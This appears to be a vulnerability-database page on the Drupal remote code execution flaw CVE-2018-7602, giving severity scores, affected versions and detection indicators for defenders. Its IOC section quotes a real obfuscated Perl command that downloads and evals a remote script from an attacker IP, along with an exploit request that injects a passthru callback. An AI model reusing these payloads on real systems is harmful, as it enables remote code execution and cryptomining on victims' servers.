cbcvebase.
CVE-2018-7602
published 2018-07-19

CVE-2018-7602: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-04
Exploited in the wild
EPSS
99.24%
99.9th percentile
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.

Affected

19 ranges
VendorProductVersion rangeFixed in
debiandebian_linux
debiandebian_linux
debiandebian_linux
drupalcore>= 7.0 < 7.597.59
drupalcore>= 8.0 < 8.4.88.4.8
drupalcore>= 8.0.0 < 8.4.88.4.8
drupalcore>= 8.5 < 8.5.38.5.3
drupalcore>= 8.5.0 < 8.5.38.5.3
drupalcore>= unspecified < 7.597.59
drupalcore>= unspecified < 8.5.38.5.3
drupalcore>= unspecified < 8.4.88.4.8
drupaldrupal
drupaldrupal>= 7.0 < 7.597.59
drupaldrupal>= 7.0 < 7.597.59
drupaldrupal>= 8.0 < 8.4.88.4.8
drupaldrupal>= 8.4.0 < 8.4.88.4.8
drupaldrupal>= 8.5 < 8.5.38.5.3
drupaldrupal>= 8.5.0 < 8.5.38.5.3
drupaldrupal_core

Detection & IOCsextracted from sources · hover to see the quote

ip147.52.43.159
commandsh -c p$(printf e)rl -e 'BEGIN{$0=$$};use IO::Socket::INET;if(my$c=new IO::Socket::INET(PeerAddr=>"147.52.43.159:80")){print $c $_."\r\n" for (q{GET /sites/z.html HTTP/1.1},q{Host:147.52.43.159},q{User-Agent: Mozilla/5.0},q{});my$x;{local$/=undef;$x=};while($x=~s/(.*)\r\n//){last if$x=~/^$/;}eval($x);}'
hash033e78cfb8c9c91e0eeb9174a7c2f551aa27fe71
hash37faefefead49b36d19894f87233072464fa55df
hash6b709126f5621ec3b04c12aacc7dd3803acdd6b8
hash34e2df62adfcbfbba39c74cce50f734bb284f3b3
hashed816cf0af6b0627169f67ca2492d7e4ec0e275d
hash471026a4954e16e203a859c5df02cdd2cc6e3e7b
hash8108be495ea194d796623dfb8358da24605a69f7
hash2a87dcfcfcdc4ce17b7e1655bb2f7c2ef7505885
hashbf2cc8ac57bc761466b39b98bb39d4ac54a4d501
hash7d08e8e99f6f705bcea01344165fe9eee6ea3032
hash8554a3b4bebd96ec3d1aebe9a0377a2d33ea4a46
hashaaf8a7610de4d52e4776c9a31351c43ddceec8e8
hash269b8aa8cb380b84d8a027e33f545348aad39e0e
hash152e70ebb75afce96064ad200292e0d593123c72
hashd693a5eeb905dba9999970d09fbe7b010a6fa47c
hashd2aa8367d07b20b023abc9c09c06798c85c83e63
hasha822a9a3585010305ebd011e4ed067bc8d94bb26
hash251bad0a90f19e58350f5e380a248f57c7ec6325
hash1e0860b7ac5670592401f39ed2381ec35113f48f
hash7b738f7d3af04ca0f557b8dd70785dde68578cb0
hashebc08466d16fadeac8b58bec88b12167d3fe8889
hash8a71a8a6bf3699190885ec385e3c7f4d880234d1
hash234921f046db70257eec90b4b340521035b4a29e
hashbee2858e02b05ed5c5e9b2b6f9e4dc6bb513d005
hash8c8c1cde5d2cdaa25049ffee03793f3c97bf6eae
hash7aa3def6bb77003d162a93336db6b830ebebf1ef
hashfefe0846e5030608b2c8b1728a7c8f190af0bc81
hash57cba985f16fc9f7b0441fd42b4c60dec10415f3
hash3d52ac0ecce42a28487a4a13c261a86f84b6afbd
hash4279c71c5e7c0b0253b5a04762ef13ab9d8e66a6
hash18e5ba9f0c9f794839bdcabcb67ca7e67676fecf
ip163.172.226.137
ip163.172.207.198
ip163.172.204.219
ip163.172.207.71
ip163.172.204.213
ip163.172.207.69
ip163.172.205.136
url/?q=user%2Flogin
url/?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}}
command/?q={{userid}}/cancel&destination={{userid}}/cancel?q[#post_render][]=passthru&q[#type]=markup&q[#markup]=echo COP-2067-8102-EVC | rev
  • Exploit chain uses the `destination` parameter with `#post_render` callback set to `passthru` to achieve RCE — look for URL-encoded `%23post_render` or `#post_render` in Drupal HTTP requests targeting `/cancel` endpoints
  • Post-exploitation: watch for Apache worker processes spawning `sh -c perl` or obfuscated `p$(printf e)rl` shell commands downloading remote Perl scripts
  • Exploit uses the `file/ajax/actions/cancel/#options/path/` endpoint with a `form_build_id` parameter — monitor for POST requests to this Drupal AJAX path
  • Shodan query `http.component:"drupal"` can be used to identify exposed Drupal instances for proactive scanning
  • Multiple Perl processes running simultaneously with `monero7` as a parameter is a strong indicator of post-exploitation cryptomining activity
  • ·The attack hides the `perl` invocation using shell obfuscation (`p$(printf e)rl`) to evade simple string-match detections on process names
  • ·The Perl script embeds 16 hex-encoded GZIP-compressed ELF objects loaded at runtime — file-based detections must cover both the zipped and unzipped versions of each ELF object
  • ·CVE-2018-7602 exploitation requires an authenticated session (valid Drupal login) as part of the exploit chain — the PoC template performs a login step before triggering RCE

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_ubuntu3.5LOW
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.